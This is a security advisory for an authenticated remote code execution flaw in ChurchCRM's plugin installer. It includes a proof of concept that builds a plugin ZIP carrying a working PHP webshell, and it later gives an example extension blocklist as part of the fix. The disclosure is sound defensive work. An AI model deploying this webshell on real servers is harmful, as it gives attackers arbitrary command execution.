
CVE-2026-58409 : Authenticated Remote Code Execution (RCE)

Summary

A critical vulnerability was identified in ChurchCRM's plugin installation mechanism that allows an authenticated administrator to achieve full Remote Code Execution (RCE) on the underlying server. The file extension validation logic used for plugin ZIP archives explicitly includes .php in its allowed extensions list, while the dangerous extensions denylist fails to block standard PHP files. As a result, any PHP file placed inside the archive is extracted directly under the web root and becomes immediately executable via HTTP without the plugin even needing to be "enabled" through the application UI.

CVE: CVE-2026-58409 | CVSS Score: Critical | Advisory: GHSA-37mf-vq43-5qp9 | Author: iltosec


Vulnerability Details

Root Cause

File: ChurchCRM/Plugin/PluginInstaller.php
Endpoint: POST /plugins/api/plugins/install-url
Required Privilege: Authenticated Administrator (Session or API Key)

The root cause lies in insufficient file validation logic during plugin archive extraction:

[image omitted]

Destination: /var/www/html/churchcrm/plugins/community/{pluginId}/

[image omitted]

Affected Files


Proof of Concept

Step 1: Build the malicious plugin archive:

PLUGIN_ID="pentest-shell"
mkdir -p /tmp/$PLUGIN_ID/src

# Mandatory plugin manifest
# /tmp/$PLUGIN_ID/plugin.json:
{
    "id": "pentest-shell",
    "name": "Pentest Shell",
    "version": "1.0.0",
    "type": "community",
    "description": "PoC RCE"
}

# PHP webshell — will be served directly by Apache
# /tmp/$PLUGIN_ID/shell.php:
<?php
if (isset($_GET['cmd'])) {
    echo '<pre>' . shell_exec($_GET['cmd'] . ' 2>&1') . '</pre>';
}

cd /tmp
zip -r pentest-shell.zip $PLUGIN_ID/
# Compute the SHA-256 the API requires
sha256sum pentest-shell.zip

Step 2: Host the ZIP over HTTPS and install:

[image omitted]

Step 3: Execute arbitrary OS commands:

[image omitted]


Impact

Successful exploitation results in full Remote Code Execution on the server in the context of the www-data user. From there, an attacker can:

Although triggering this vulnerability requires an authenticated administrator account, its impact far exceeds that privilege level: a constrained admin role within the application panel is converted into unrestricted OS-level command execution on the server.


Fix

This issue was addressed in ChurchCRM 7.4.0 (released June 18, 2026) through the following changes:

1. Dangerous Extension Blocklist Enforced on Extraction

The plugin installer now explicitly blocks server-side executable file extensions (including .php, .phar, .php5, .phtml, and others) from being extracted from plugin archives. Any plugin ZIP containing these extensions is rejected at install time.
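As an added example (not ChurchCRM's code) of the extraction-time check described above: a PHP routine that walks every ZIP entry before anything is written under the web root and rejects the whole archive if any entry carries a server-side executable extension. The function names and the exact blocklist are assumptions; the advisory itself names only .php, .phar, .php5 and .phtml.

```php
<?php
// Added example, not ChurchCRM's code: reject a plugin ZIP before extraction
// if any entry carries a server-side executable extension. Helper names and
// the blocklist contents are illustrative, not the project's exact list.
declare(strict_types=1);
// Extensions the web server may hand to the PHP engine. Compared in lower case.
const DANGEROUS_EXTENSIONS = ['php', 'phar', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'phps', 'pht'];
// Every dot-separated segment after the base name is checked, not just the last:
// Apache's AddHandler matches any segment, so "x.php.txt" may still run as PHP.
function hasDangerousExtension(string $entryName): bool
{
    $base = basename(str_replace('\\', '/', $entryName));
    $segments = explode('.', $base);
    array_shift($segments); // drop the part before the first dot
    foreach ($segments as $segment) {
        if (in_array(strtolower($segment), DANGEROUS_EXTENSIONS, true)) {
            return true;
        }
    }
    return false;
}
// Returns the offending entry names. The caller must reject the whole archive
// when the list is non-empty rather than extract the "clean" entries only.
function findDangerousEntries(string $zipPath): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath, ZipArchive::RDONLY) !== true) {
        throw new RuntimeException("Cannot open archive: $zipPath");
    }
    $offending = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        // Directory entries end in '/' and carry no file that could execute.
        if ($name !== false && substr($name, -1) !== '/' && hasDangerousExtension($name)) {
            $offending[] = $name;
        }
    }
    $zip->close();
    return $offending;
}
// Demonstration on a constructed archive: a harmless manifest plus one entry
// whose upper-case extension would slip past a case-sensitive comparison.
$tmp = sys_get_temp_dir() . '/plugin-demo-' . bin2hex(random_bytes(4)) . '.zip';
$zip = new ZipArchive();
$zip->open($tmp, ZipArchive::CREATE | ZipArchive::OVERWRITE);
$zip->addFromString('demo/plugin.json', '{"id": "demo", "type": "community"}');
$zip->addFromString('demo/shell.PHP', '<?php echo "demo";');
$zip->close();
$bad = findDangerousEntries($tmp);
echo $bad ? 'Rejected entries: ' . implode(', ', $bad) . "\n" : "Archive accepted\n";
unlink($tmp);
```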

2. Plugin Approval and Vetting Process Introduced

ChurchCRM has established a plugin vetting process for community plugins. Plugins submitted to the official plugin registry are reviewed before being listed. Administrators are encouraged to install only plugins from the official ChurchCRM plugin registry or from sources they explicitly trust.

3. Defense-in-Depth Context

Plugin installation remains a privileged, administrator-only operation — equivalent to installing a WordPress plugin or Joomla extension. The architectural model intentionally grants administrators server-level capability. The 7.4.0 hardening raises the bar against supply-chain and social-engineering attacks targeting admin accounts, while the new vetting process reduces the risk of malicious plugins reaching the official registry.

Administrators running ChurchCRM ≤ 7.3.3 are strongly encouraged to upgrade to 7.4.0 immediately.


Disclosure Timeline

Date        Event
2026-05-18  Vulnerability reported via GitHub Security Advisory
2026-06-18  Vendor acknowledged
2026-06-18  ChurchCRM 7.4.0 released (includes fix)
2026-06-18  Advisory published
